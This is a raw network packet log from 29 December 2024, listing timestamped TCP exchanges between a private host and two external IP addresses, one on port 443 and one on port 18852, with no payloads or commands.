Dec 29, 2024 11:18:19.833690882 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.840724945 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.840742111 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.840820074 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.840828896 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.840856075 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.840871096 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.848970890 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.848989010 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.849083900 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.849117041 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.849163055 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.857060909 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.857079029 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.857144117 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.857156992 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.857202053 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.003150940 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.003182888 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.003257990 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.003283024 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.003334045 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.003360033 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.011117935 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.011138916 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.011219025 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.011226892 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.011266947 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.018330097 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.018356085 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.018418074 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.018424988 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.018455029 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.018471956 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.026626110 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.026649952 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.026726961 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.026735067 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.026839018 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.034559011 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.034580946 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.034626007 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.034636021 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.034677029 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.034698009 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.042392969 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.042411089 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.042489052 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.042495966 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.042541981 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.050560951 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.050581932 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.050668955 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.050694942 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.050740957 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.057800055 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.057861090 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.057923079 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.057950974 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.057970047 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.058007956 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.204459906 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.204487085 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.204557896 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.204590082 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.204615116 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.204641104 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.212526083 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.212552071 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.212629080 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.212656975 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.212685108 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.212704897 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.220738888 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.220763922 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.220803022 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.220829964 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.220876932 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.220896006 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.227828979 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.227853060 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.227912903 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.227937937 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.227976084 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.235960007 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.235986948 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.236072063 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.236098051 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.236144066 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.243695974 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.243716955 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.243777037 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.243803978 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.243840933 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.251801014 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.251827002 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.251934052 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.251961946 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.252002954 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.260047913 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.260077000 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.260164976 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.260194063 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.260234118 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.405752897 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.405781031 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.405860901 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.405899048 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.405940056 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.413872957 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.413897991 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.413980007 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.414011002 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.414052010 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.422034025 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.422060013 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.422116995 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.422143936 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.422172070 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.422183990 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.429228067 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.429251909 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.429330111 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.429357052 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.429406881 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.437849998 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.437872887 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.437958956 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.437984943 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.438021898 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.444989920 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.445009947 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.445050001 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.445075989 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.445089102 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.445111036 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.453133106 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.453154087 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.453227997 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.453242064 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.453279972 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.461333990 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.461354017 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.461421013 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.461436987 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.461476088 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.607144117 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.607171059 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.607232094 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.607243061 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.607287884 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.607301950 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.615181923 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.615206957 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.615240097 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.615264893 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.615279913 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.615299940 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.623327971 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.623353004 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.623383045 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.623408079 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.623423100 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.623440981 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.630448103 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.630471945 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.630520105 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.630546093 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.630568981 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.630578995 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.639126062 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.639153957 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.639187098 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.639211893 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.639235020 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.639250994 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.646334887 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.646358013 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.646398067 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.646416903 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.646440983 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.646462917 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.654532909 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.654553890 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.654591084 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.654608011 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.654625893 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.654642105 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.662578106 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.662597895 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.662635088 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.662651062 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.662667036 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.662687063 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.808418989 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.808451891 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.808495045 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.808521032 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.808537960 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.808559895 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.816593885 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.816622019 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.816709995 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.816709995 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.816735983 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.816788912 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.824843884 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.824868917 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.824906111 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.824932098 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.824958086 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.824966908 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.832962036 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.832993031 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.833058119 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.833084106 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.833101988 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.833120108 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.840554953 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.840578079 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.840646029 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.840672016 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.840711117 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.847856998 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.847883940 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.847970009 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.847995043 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.848032951 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.855865002 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.855897903 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.855968952 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.855994940 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.856012106 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.856031895 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.864059925 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.864094973 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.864162922 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:20.864187956 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:20.864228010 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.010955095 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.010987997 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.011074066 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.011107922 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.011147022 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.018079042 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.018102884 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.018173933 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.018199921 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.018245935 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.026284933 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.026313066 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.026391983 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.026417017 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.026459932 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.034524918 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.034545898 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.034631014 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.034657955 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.034699917 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.042062998 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.042078972 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.042174101 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.042200089 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.042268038 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.050194025 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.050209999 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.050286055 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.050312042 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.050358057 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.057387114 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.057401896 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.057478905 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.057493925 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.057533026 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.065485001 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.065501928 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.065591097 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.065615892 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.065663099 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.192002058 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:21.212498903 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.212521076 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.212567091 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.212589025 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.212605953 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.212627888 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.219607115 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.219625950 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.219683886 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.219712019 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.219727039 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.219753981 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.227772951 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.227792025 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.227833986 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.227859974 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.227879047 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.227900982 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.235920906 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.235938072 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.235981941 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.236010075 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.236030102 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.236052990 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.243585110 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.243606091 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.243650913 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.243678093 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.243695021 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.243716955 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.251773119 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.251833916 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.252115011 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.252166986 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.258913040 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.258929968 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.259001970 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.259027004 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.259068012 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.267173052 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.267191887 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.267263889 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.267290115 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.267327070 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.311309099 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:21.311424971 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:21.413753986 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.413783073 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.413893938 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.413940907 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.413985014 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.420857906 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.420876980 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.420974970 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.421003103 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.421045065 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.429116011 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.429141045 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.429224968 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.429251909 CET	443	49708	47.79.48.211	192.168.2.7
